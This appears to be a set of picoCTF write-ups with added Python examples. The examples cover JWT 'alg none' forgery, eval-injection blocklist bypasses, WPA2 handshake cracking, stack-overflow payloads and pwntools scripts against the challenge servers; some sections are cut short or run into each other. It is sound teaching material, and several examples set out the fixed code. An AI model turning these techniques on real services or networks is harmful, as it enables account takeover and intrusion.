└─$ strings * | grep -r "pico"
strings: Warning: 'big-zip-files' is a directory
grep: files.zip: binary file matches
big-zip-files/folder_pmbymkjcya/folder_cawigcwvgv/folder_ltdayfmktr/folder_fnpfclfyee/whzxrpivpqld.txt:information on the record will last a billion years. Genes and brains and books encode picoCTF{gr3p_15_m4g1c_ef8790dc}
==picoCTF{gr3p_15_m4g1c_ef8790dc}==
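One caveat worth knowing about the command above: with -r and no file operand, GNU grep ignores standard input and searches the current directory recursively, so the strings output was never actually consulted; grep found the flag on its own, which is why the output lists file paths (and why it reports that files.zip matches as a binary file). The following is an added example, not part of the original writeup, that does the same search in Python: it walks a tree, scans every file as raw bytes (no "binary file matches" problem), and also looks inside zip archives, which grep cannot see into when the members are compressed. The directory tree and flags it builds are constructed for the example.

```python
import os
import re
import tempfile
import zipfile

FLAG_RE = re.compile(rb'picoCTF\{[^}\n]*\}')


def flags_in(data: bytes):
    """Every picoCTF{...} string in a byte buffer, text or binary alike."""
    return [m.decode('ascii', 'replace') for m in FLAG_RE.findall(data)]


def find_flags(root: str) -> dict:
    """Walk root; scan each file as raw bytes (like grep -a) and the members of any zip found."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                data = fh.read()
            for flag in flags_in(data):
                hits.setdefault(flag, []).append(path)
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for member in zf.namelist():
                        for flag in flags_in(zf.read(member)):
                            hits.setdefault(flag, []).append(path + ':' + member)
    return hits


def build_constructed_tree(base: str) -> str:
    """Constructed stand-in for the challenge's nested folders; every flag here is made up."""
    deep = os.path.join(base, 'big-zip-files', 'folder_a', 'folder_b')
    os.makedirs(deep, exist_ok=True)
    with open(os.path.join(deep, 'notes.txt'), 'w') as fh:
        fh.write('some text around picoCTF{constructed_text_flag}\n')
    with open(os.path.join(deep, 'blob.bin'), 'wb') as fh:
        fh.write(b'\x00\x7fELF\x02picoCTF{constructed_binary_flag}\xff\xfe')
    # Deflated, so the member's bytes are not visible in the raw archive; only unpacking finds it.
    with zipfile.ZipFile(os.path.join(base, 'files.zip'), 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('inner/secret.txt', 'picoCTF{constructed_zip_flag}')
    return base


def demo() -> dict:
    """Build the constructed tree in a temp dir and return flag -> [locations]."""
    return find_flags(build_constructed_tree(tempfile.mkdtemp()))


if __name__ == '__main__':
    for flag, where in demo().items():
        print(flag, where)
```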
ASCII Numbers
Description
Convert the following string of ASCII numbers into a readable string:
Description
Most web application developers use third party components without testing their security. Some of the past affected companies are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonseca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running here. Can you become an admin? You can log in as test with the password Test123! to get started.
Initial Analysis
We can log in as test:Test123!.
Checking the cookies, the session is a JSON Web Token (JWT).
The hints also mention past vulnerabilities where the token can be tampered with to change the role from user to admin.
When I first looked at this problem, I noticed that the second hint mentioned two parts. Reviewing my JWT, I realized it consisted of only one part. How can I make it two parts? The solution is to separate it with a dot (.).
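The "two parts" observation matches what an unsigned JWT looks like: header.payload. with an empty third segment and "alg":"none" in the header. A server that reads the algorithm from the token instead of pinning it will then skip signature checking and trust whatever claims we put in the payload. The following is an added example (not the challenge's code or the service's real implementation) that forges such a token from a signed one and shows a naive verifier accepting it while a verifier that pins HS256 rejects it. The signing key and the claim names user and role are assumptions for the example.

```python
import base64
import hashlib
import hmac
import json

# Constructed signing key for this example; the real service's key is unknown.
KEY = b'constructed-server-secret'


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b'=').decode('ascii')


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))


def _segment(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(',', ':')).encode())


def make_jwt(payload: dict, key: bytes) -> str:
    """Issue a properly signed HS256 token, the way the server would."""
    body = _segment({'alg': 'HS256', 'typ': 'JWT'}) + '.' + _segment(payload)
    sig = hmac.new(key, body.encode(), hashlib.sha256).digest()
    return body + '.' + b64url_encode(sig)


def decode_jwt(token: str):
    header_b64, payload_b64, sig_b64 = token.split('.')
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def forge_unsigned(token: str, **changes) -> str:
    """Tamper with claims and drop the signature: alg=none, header.payload. (empty third segment)."""
    header, payload, _ = decode_jwt(token)
    header['alg'] = 'none'
    payload.update(changes)
    return _segment(header) + '.' + _segment(payload) + '.'


def verify_naive(token: str, key: bytes):
    """Buggy verifier: trusts the alg field from the attacker-controlled header."""
    header, payload, sig_b64 = decode_jwt(token)
    if header.get('alg') == 'none':
        return payload                      # accepts the unsigned token as-is
    if header.get('alg') == 'HS256':
        body = token.rsplit('.', 1)[0].encode()
        expected = hmac.new(key, body, hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return payload
    return None


def verify_strict(token: str, key: bytes):
    """Fixed verifier: the algorithm is pinned server-side, never read from the token."""
    header, payload, sig_b64 = decode_jwt(token)
    if header.get('alg') != 'HS256':
        return None
    body = token.rsplit('.', 1)[0].encode()
    expected = hmac.new(key, body, hashlib.sha256).digest()
    return payload if hmac.compare_digest(expected, b64url_decode(sig_b64)) else None


if __name__ == '__main__':
    original = make_jwt({'user': 'test', 'role': 'user'}, KEY)
    forged = forge_unsigned(original, role='admin')
    print(forged)
    print('naive :', verify_naive(forged, KEY))
    print('strict:', verify_strict(forged, KEY))
```

The forged token keeps the header and payload segments and ends in a bare dot, which is the shape to look for when a hint talks about "two parts"; the strict verifier shows the one-line server-side fix.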
==picoCTF{succ3ss_@u7h3nt1c@710n_72bf8bd5}==
RE
ASCII FTW
Description
This program has constructed the flag using hex ASCII values. Identify the flag text by disassembling the program. You can download the file from here.
Loading the binary into Ghidra and reading the disassembly, we can see that the routine that builds the flag is never actually called, but the hex ASCII values it moves onto the stack, read in address order, spell out the flag.
==picoCTF{ASCII_IS_EASY_3CF4BFAD}==
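Both ASCII Numbers and ASCII FTW come down to turning a list of byte values into text; the only difference is where the numbers come from (a string in the description, or byte immediates in a disassembly). The following added example, which is not part of the writeup, does both: a decoder for runs of hex or decimal ASCII codes, and a parser that pulls the byte stores out of a Ghidra- or gdb-style listing and reads them back in stack-address order. The listing embedded below is constructed for the example; the real binary's offsets and bytes differ.

```python
import re


def decode_ascii_numbers(text: str) -> str:
    """Turn ASCII codes written as hex (0x70 0x69 ...) or decimal (112 105 ...) into text."""
    tokens = re.findall(r'0x[0-9a-fA-F]+|\d+', text)
    codes = [int(t, 16) if t.lower().startswith('0x') else int(t) for t in tokens]
    return bytes(codes).decode('ascii')


# Matches both Ghidra ("byte ptr [RBP + -0x30],0x70") and gdb ("BYTE PTR [rbp-0x30],0x70") syntax.
_STORE = re.compile(
    r'byte ptr \[rbp\s*(?:\+\s*)?(-?0x[0-9a-f]+)\]\s*,\s*(0x[0-9a-f]+)', re.IGNORECASE)


def flag_from_byte_stores(listing: str) -> str:
    """Collect every byte immediate written to the stack and read them back lowest address first."""
    stores = []
    for line in listing.splitlines():
        m = _STORE.search(line)
        if m:
            stores.append((int(m.group(1), 16), int(m.group(2), 16)))
    stores.sort()  # the string starts at the lowest address
    return bytes(v for _, v in stores).rstrip(b'\x00').decode('ascii')


# Constructed listing in Ghidra's syntax spelling a made-up flag; not the challenge binary.
CONSTRUCTED_LISTING = """
        MOV        byte ptr [RBP + -0x30],0x70
        MOV        byte ptr [RBP + -0x2f],0x69
        MOV        byte ptr [RBP + -0x2e],0x63
        MOV        byte ptr [RBP + -0x2d],0x6f
        MOV        byte ptr [RBP + -0x2c],0x43
        MOV        byte ptr [RBP + -0x2b],0x54
        MOV        byte ptr [RBP + -0x2a],0x46
        MOV        byte ptr [RBP + -0x29],0x7b
        MOV        byte ptr [RBP + -0x28],0x65
        MOV        byte ptr [RBP + -0x27],0x78
        MOV        byte ptr [RBP + -0x26],0x7d
        MOV        byte ptr [RBP + -0x25],0x0
"""

if __name__ == '__main__':
    print(decode_ascii_numbers('0x70 0x69 0x63 0x6f'))
    print(flag_from_byte_stores(CONSTRUCTED_LISTING))
```

Sorting by offset matters: compilers do not always emit the stores in string order, and a listing copied out of a decompiler may be reordered, so trusting the order of lines instead of the addresses gives a scrambled flag.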
Bit-O-Asm-1
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
The first few instructions are only frame setup and never touch EAX. Then mov eax,0x30 copies the immediate 0x30 into EAX.
So EAX = 0x30 = 48.
==picoCTF{48}==
Bit-O-Asm-2
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
Same idea as before, but this time eax is loaded from the stack slot [rbp-0x4]. Earlier in the listing (line 15) that slot was written with 0x9fe1a, so eax = 0x9fe1a = 654874.
==picoCTF{654874}==
Bit-O-Asm-3
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
rbp-0x4 = 0x9fe1a
cmp means compare: it computes (0x9fe1a <operator> 0x2710) and sets the flags.
The operator comes from the conditional jump that follows: jle (jump if <=).
(0x9fe1a <= 0x2710), i.e. (654874 <= 10000)
If the jump is taken (condition true), the add with 0x65 path runs; if it falls through (condition false), the sub with 0x65 path runs.
654874 is not <= 10000, so the jump is not taken and the subtraction happens: 0x9fe1a - 0x65 = 654874 - 101 = 654773.
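Tracing a few instructions by hand is fine for these three dumps, but it is easy to get a branch direction backwards. The following added example, not part of the writeup, is a tiny interpreter for the handful of instructions these dumps use (mov, add, sub, cmp, jle, jmp, ret with eax and [rbp-N] stack slots) that returns the value left in eax. The listing it runs is constructed to have the shape described above (not the challenge's actual dump): store 0x9fe1a, compare with 0x2710, jle to the add branch, otherwise subtract 0x65.

```python
import re

_MEM = re.compile(r'DWORD PTR \[rbp-(0x[0-9a-f]+)\]', re.I)
_LINE = re.compile(r'\s*<\+(\d+)>:\s*(\S+)\s*(.*)')
_TARGET = re.compile(r'<main\+(\d+)>')


def emulate(listing: str) -> int:
    """Run a gdb-style listing of main and return the value in eax when it hits ret."""
    insns = []
    for line in listing.splitlines():
        m = _LINE.match(line)
        if m:
            insns.append((int(m.group(1)), m.group(2), m.group(3).strip()))
    by_offset = {off: i for i, (off, _, _) in enumerate(insns)}

    regs = {'eax': 0, 'rbp': 0, 'rsp': 0}
    mem = {}          # stack slots, keyed by their negative offset from rbp
    last_cmp = 0      # signed (left - right) of the most recent cmp

    def operand(text):
        text = text.strip()
        m = _MEM.fullmatch(text)
        if m:
            return ('mem', -int(m.group(1), 16))
        if text in regs:
            return ('reg', text)
        return ('imm', int(text, 0))

    def load(op):
        kind, v = op
        return mem.get(v, 0) if kind == 'mem' else regs[v] if kind == 'reg' else v

    def store(op, value):
        kind, v = op
        value &= 0xffffffff                 # 32-bit register / DWORD slot
        if kind == 'mem':
            mem[v] = value
        elif kind == 'reg':
            regs[v] = value
        else:
            raise ValueError('cannot write to an immediate')

    def signed(x):
        return x - (1 << 32) if x & 0x80000000 else x

    pc = 0
    while pc < len(insns):
        _, mnem, ops = insns[pc]
        pc += 1
        if mnem in ('endbr64', 'push', 'pop'):   # frame housekeeping; never touches eax
            continue
        if mnem == 'ret':
            break
        if mnem in ('jmp', 'jle'):
            target = int(_TARGET.search(ops).group(1))
            if mnem == 'jmp' or last_cmp <= 0:   # jle: taken when left <= right (signed)
                pc = by_offset[target]
            continue
        dst, src = (operand(o) for o in ops.split(','))
        if mnem == 'mov':
            store(dst, load(src))
        elif mnem == 'add':
            store(dst, load(dst) + load(src))
        elif mnem == 'sub':
            store(dst, load(dst) - load(src))
        elif mnem == 'cmp':
            last_cmp = signed(load(dst)) - signed(load(src))
        else:
            raise NotImplementedError(mnem)
    return regs['eax']


# Constructed listing with the structure the writeup describes; offsets are made up.
CONSTRUCTED_DUMP = """
<+0>:  endbr64
<+4>:  push rbp
<+5>:  mov rbp,rsp
<+8>:  mov DWORD PTR [rbp-0x4],0x9fe1a
<+15>: cmp DWORD PTR [rbp-0x4],0x2710
<+22>: jle <main+35>
<+24>: mov eax,DWORD PTR [rbp-0x4]
<+27>: sub eax,0x65
<+30>: mov DWORD PTR [rbp-0x4],eax
<+33>: jmp <main+44>
<+35>: mov eax,DWORD PTR [rbp-0x4]
<+38>: add eax,0x65
<+41>: mov DWORD PTR [rbp-0x4],eax
<+44>: mov eax,DWORD PTR [rbp-0x4]
<+47>: pop rbp
<+48>: ret
"""

if __name__ == '__main__':
    print(emulate(CONSTRUCTED_DUMP))
```

Swapping the stored constant for something below 0x2710 sends execution down the add path instead, which is a quick way to confirm which side of the jle is which.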
==picoCTF{654773}==
Picker I
Description
This service can provide you with a random number, but can it do anything else? Connect to the program with netcat: $ nc saturn.picoctf.net 55986 The program's source code can be downloaded here.
while(True):
    try:
        print('Try entering "getRandomNumber" without the double quotes...')
        user_input = input('==> ')
        eval(user_input + '()')
    except Exception as e:
        print(e)
This code is vulnerable because it passes our input straight to eval(), appending () so that whatever name we type gets called. Looking through the source there is a win() function that reads flag.txt, and that is our target.
Try entering "getRandomNumber" without the double quotes...
==> getRandomNumber
4
Try entering "getRandomNumber" without the double quotes...
==> win
[Errno 2] No such file or directory: 'flag.txt'
Try entering "getRandomNumber" without the double quotes...
==> print(open('flag.txt', 'r').read())
[Errno 2] No such file or directory: 'flag.txt'
Simple script:
from pwn import *

r = remote('saturn.picoctf.net', 55986)
# wait for the prompt, then send the function name; the service appends '()' and evals it
r.sendlineafter(b'quotes...', b'win')
r.interactive()
==picoCTF{4_d14m0nd_1n_7h3_r0ugh_b523b2a1}==
Picker II
Description
Can you figure out how this program works to get the flag?
def filter(user_input):
    if 'win' in user_input:
        return False
    return True

while(True):
    try:
        user_input = input('==> ')
        if( filter(user_input) ):
            eval(user_input + '()')
        else:
            print('Illegal input')
    except Exception as e:
        print(e)
Same as Picker I, but this time the word win is filtered out of the input. Bypass the filter with an expression that reaches the flag without containing that word, for example by reading the file directly as we tried in Picker I.
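A substring blocklist in front of eval() does not change the bug: the input is still executed as Python, so any expression that evaluates to a callable without spelling the forbidden word still wins. The following is an added example, not the challenge code, that reproduces the Picker I/II dispatcher in a local sandbox (win() returns a constructed flag instead of reading flag.txt) and sets it beside the hardened form, where the typed name is only ever used as a dictionary key.

```python
FLAG = 'picoCTF{constructed_flag}'   # constructed; the real services read flag.txt


def getRandomNumber():
    return 4   # chosen by fair dice roll, as in the challenge


def win():
    return FLAG


NAMESPACE = {'getRandomNumber': getRandomNumber, 'win': win}


def picker_eval(user_input: str, blocklist=()):
    """What Picker I/II do: reject input containing a blocked word, then eval(user_input + '()')."""
    for word in blocklist:
        if word in user_input:
            return 'Illegal input'
    # Attacker text becomes code: any expression that evaluates to a callable gets called.
    return eval(user_input + '()', dict(NAMESPACE))


ALLOWED = {'getRandomNumber': getRandomNumber}


def picker_dispatch(user_input: str):
    """Hardened form: the name is looked up in an allow-list and never handed to eval()."""
    func = ALLOWED.get(user_input.strip())
    return func() if func else 'Illegal input'


if __name__ == '__main__':
    print(picker_eval('getRandomNumber'))
    print(picker_eval('win', blocklist=('win',)))
    # The blocklist only sees the literal text; the expression still resolves to win at runtime.
    print(picker_eval("globals()['w'+'in']", blocklist=('win',)))
    print(picker_dispatch("globals()['w'+'in']"))
```

The writeup's own bypass, reading flag.txt directly, works for the same reason: the filter checks the characters of the input, while eval() runs whatever those characters mean.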
Picker III
Description
Can you figure out how this program works to get the flag?
def reset_table():
    global func_table

    # This table is formatted for easier viewing, but it is really one line
    func_table = \
    \
    print_table \
    read_variable \
    write_variable \
    getRandomNumber \
---Snippet---
def read_variable():
    var_name = input('Please enter variable name to read: ')
    if( filter_var_name(var_name) ):
        eval('print('+var_name+')')
    else:
        print('Illegal variable name')

def filter_value(value):
    if ';' in value or '(' in value or ')' in value:
        return False
    else:
        return True

def write_variable():
    var_name = input('Please enter variable name to write: ')
    if( filter_var_name(var_name) ):
        value = input('Please enter new value of variable: ')
        if( filter_value(value) ):
            exec('global '+var_name+'; '+var_name+' = '+value)
        else:
            print('Illegal value')
    else:
        print('Illegal variable name')
From the source we can conclude that the previous payload can no longer be used, since filter_value rejects any value containing ';', '(' or ')'. But there is a bug we can use: write_variable lets us create a new global variable, and read_variable evals whatever name we give it.
IDEA
3 -> write a variable
win -> the variable name (can be anything that passes filter_var_name)
open('flag.txt', 'r').read() -> needs modifying, since the parentheses are filtered.
"open" + "\x28" + "\"flag.txt\"" + "," + "\"r\"" + "\x29" + ".read" + "\x28" + "\x29"
2 -> read a variable
win -> our created variable.
That is how it should work, but I am stuck at displaying the flag.
python3 picker-III.py
==> 3
Please enter variable name to write: win
Please enter new value of variable: "open" + "\x28" + "\"flag.txt\"" + "," + "\"r\"" + "\x29" + ".read" + "\x28" + "\x29"
==> 2
Please enter variable name to read: win
open("flag.txt","r").read()
TODO
GDB baby step 1
Description
Can you figure out what is in the eax register at the end of the main function? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Disassemble this.
set disassembly-flavor intel
break main
layout asm
r
break *0x401142
c
print/d $eax
==picoCTF{307019}==
Forensics
WPA-ing Out
Description
I thought that my password was super-secret, but it turns out that passwords passed over the AIR can be CRACKED, especially if I used the same wireless network password as one in the rockyou.txt credential dump. Use this 'pcap file' and the rockyou wordlist. The flag should be entered in the picoCTF{XXXXXX} format.
Initial Analysis
Opening the pcap shows 802.11 frames, so this is a wireless (Wi-Fi) capture.
The challenge mentions a password and a wireless network, so we can use aircrack-ng with the rockyou wordlist to crack the WPA handshake in the capture.
aircrack-ng wpa-ing_out.pcap -w /usr/share/wordlists/rockyou.txt
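What aircrack-ng is doing with that wordlist is worth seeing once in code: for each candidate passphrase it derives the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt), expands it into the PTK with the MACs and nonces from the 4-way handshake, and checks whether the resulting KCK reproduces the MIC on the captured EAPOL frame. The following is an added example, not from the writeup or aircrack-ng, that implements that WPA2-PSK check in pure Python. The handshake it cracks is constructed (made-up MACs, nonces and a placeholder EAPOL-Key frame with the MIC field zeroed), with the target MIC computed from the passphrase the writeup recovered so the search has something to hit.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the slow step of every guess."""
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b''.join(hmac.new(key, label + b'\x00' + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def wpa2_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of the PTK: the Key Confirmation Key that authenticates EAPOL frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b'Pairwise key expansion', data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the EAPOL frame with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake: dict, wordlist):
    """Return the first passphrase whose derived KCK reproduces the captured MIC, else None."""
    for word in wordlist:
        pmk = wpa2_pmk(word, handshake['ssid'])
        kck = wpa2_kck(pmk, handshake['ap_mac'], handshake['sta_mac'],
                       handshake['anonce'], handshake['snonce'])
        if hmac.compare_digest(eapol_mic(kck, handshake['eapol']), handshake['mic']):
            return word
    return None


# Constructed handshake: every value below is made up for the example, not taken from the pcap.
_SSID = 'constructed-ssid'
_AP, _STA = bytes.fromhex('000c41aa0001'), bytes.fromhex('000c41bb0002')
_ANONCE, _SNONCE = bytes(range(32)), bytes(range(32, 64))
_EAPOL = bytes.fromhex('0103005f02010a00') + bytes(0x5f - 4)   # placeholder EAPOL-Key frame, MIC zeroed
HANDSHAKE = {'ssid': _SSID, 'ap_mac': _AP, 'sta_mac': _STA,
             'anonce': _ANONCE, 'snonce': _SNONCE, 'eapol': _EAPOL}
HANDSHAKE['mic'] = eapol_mic(
    wpa2_kck(wpa2_pmk('mickeymouse', _SSID), _AP, _STA, _ANONCE, _SNONCE), _EAPOL)


def demo():
    """A five-word stand-in for rockyou.txt."""
    return crack(HANDSHAKE, ['password', '123456', 'qwerty', 'mickeymouse', 'letmein'])


if __name__ == '__main__':
    print(demo())
```

The PBKDF2 step is why the SSID matters as much as the passphrase: the same passphrase on a different SSID yields a different PMK, so precomputed tables only work per network name, and why a long random passphrase survives this attack even when the handshake is captured.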
==picoCTF{mickeymouse}==
Binary/Pwn
Local Target
Description
Smash the stack
Can you overflow the buffer and modify the other local variable? The program is available here. You can view the source here. And connect with it using: nc saturn.picoctf.net 57499
Initial Analysis
char input[16];
int num = 64;
printf("Enter a string: ");
fflush(stdout);
gets(input);
printf("\n");
printf("num is %d\n", num);
fflush(stdout);
if( num == 65 ){
printf("You win!\n");
fflush(stdout);
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
There is a condition to meet: num needs to be 65. But nothing in the program ever reads into num; the only input is gets(input), which has no length limit.
The input buffer is 16 bytes, and num sits 24 bytes past the start of input on the stack (16 bytes of buffer plus 8 extra bytes from how the frame is laid out on this 64-bit binary), so 24 filler characters reach num:
echo -e 'AAAAAAAAAAAAAAAAAAAAAAAA\x41' | ./local-target
-- The 24 A's fill the buffer and the padding, so the next byte lands on num. num is stored little-endian as 0x40 0x00 0x00 0x00 (64), so writing 0x41 (65) over its first byte makes num = 65.
Using GDB (still new to me)
Launch the binary under GDB (with pwndbg):
cyclic 100
run, and paste the cyclic pattern as the input
cyclic -l <value found in RIP>
cyclic -l <value found in RBP>
Here we want the offset relative to the frame rather than RIP: the flag is printed from inside main, so we only need to overwrite num in the same stack frame, not the return address.
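The cyclic / cyclic -l pair works because the pattern is a de Bruijn sequence: every 4-byte window occurs exactly once, so whatever 4 bytes turn up in a register or variable after the crash pin down their offset in the input. For Local Target there is no crash to inspect, but the program prints num after gets(), so the 4 bytes that landed in num can be read straight off the "num is %d" line. The following is an added example, not part of the writeup and not pwntools itself, that reimplements that pattern generation and lookup and builds the final payload. The "printed" value in demo() is constructed by simulating the overflow under the assumption that num lies 24 bytes past the start of input.

```python
from functools import lru_cache
import string

ALPHABET = string.ascii_lowercase   # same alphabet and 4-byte window as pwntools' cyclic
N = 4


@lru_cache(maxsize=None)
def _de_bruijn() -> bytes:
    """Lexicographically smallest de Bruijn sequence B(26, 4): every 4-letter window is unique."""
    k = len(ALPHABET)
    a = [0] * (k * N)
    seq = []

    def db(t, p):
        if t > N:
            if N % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return ''.join(ALPHABET[i] for i in seq).encode()


def cyclic(length: int) -> bytes:
    """The first `length` bytes of the pattern (what `cyclic 100` prints)."""
    return _de_bruijn()[:length]


def cyclic_find(value) -> int:
    """Offset of a 4-byte window; accepts the raw bytes or the integer the program printed for them."""
    if isinstance(value, int):
        value = value.to_bytes(N, 'little')
    return _de_bruijn().find(value[:N])


def build_payload(offset: int, value: int, width: int = 4) -> bytes:
    """Filler up to the target variable, then the new value as a little-endian int."""
    return b'A' * offset + value.to_bytes(width, 'little')


def demo():
    probe = cyclic(100)
    # Constructed: what local-target would print as "num is %d" after gets() copied `probe`
    # over the 16-byte buffer, assuming num lies 24 bytes past the start of input.
    printed_num = int.from_bytes(probe[24:28], 'little')
    offset = cyclic_find(printed_num)
    return offset, build_payload(offset, 65)


if __name__ == '__main__':
    offset, payload = demo()
    print(offset, payload)
```

Feeding the pattern to the real binary and pasting the printed num into cyclic_find is the whole procedure; the same lookup on the value in RIP is what you would do when the target is the return address instead.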
Payload
from pwn import *

#io = remote('saturn.picoctf.net', 64428)
io = process('./local-target')

# 24 bytes of filler reach num (16-byte buffer plus 8 bytes of padding).
padding = 24
p = flat([
    asm('nop') * padding,
    0x41  # num = 65; flat() packs it as a little-endian word
])
io.sendlineafter(b':', p)
io.interactive()
==picoCTF{l0c4l5_1n_5c0p3_fee8ef05}==
Picker IV
Description
Can you figure out how this program works to get the flag? Connect to the program with netcat: $ nc saturn.picoctf.net 63096 The program's source code can be downloaded here. The binary can be downloaded here.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
PIE is disabled, which means the binary is loaded at the same address (0x400000) every run, so the address of win never changes.
Checking the source code
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void print_segf_message(){
printf("Segfault triggered! Exiting.\n");
sleep(15);
exit(SIGSEGV);
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
--snippet--
int main() {
signal(SIGSEGV, print_segf_message);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
unsigned int val;
printf("Enter the address in hex to jump to, excluding '0x': ");
scanf("%x", &val);
printf("You input 0x%x\n", val);
void (*foo)(void) = (void (*)())val;
foo();
}
There are two interesting functions, main and win. Reading main, we can see that it reads a hex address from us and jumps to it, so all we need is the address of win.
It was direct and can be done using objdump
objdump -d picker-IV| grep win
Supply the address to the input (scanf's %x accepts it with or without the 0x prefix):
./picker-IV
Enter the address in hex to jump to, excluding '0x': 0x40129e
You input 0x40129e
Using GDB
pwndbg> info functions win
All functions matching regular expression "win":
Non-debugging symbols:
0x000000000040129e win
The payload will look like:
from pwn import *

#r = remote('saturn.picoctf.net', 63096)
r = process("./picker-IV")

# 0x000000000040129e is win; the prompt asks for the address without the '0x'
win = b'40129e'
r.sendlineafter(b"'0x': ", win)
r.interactive()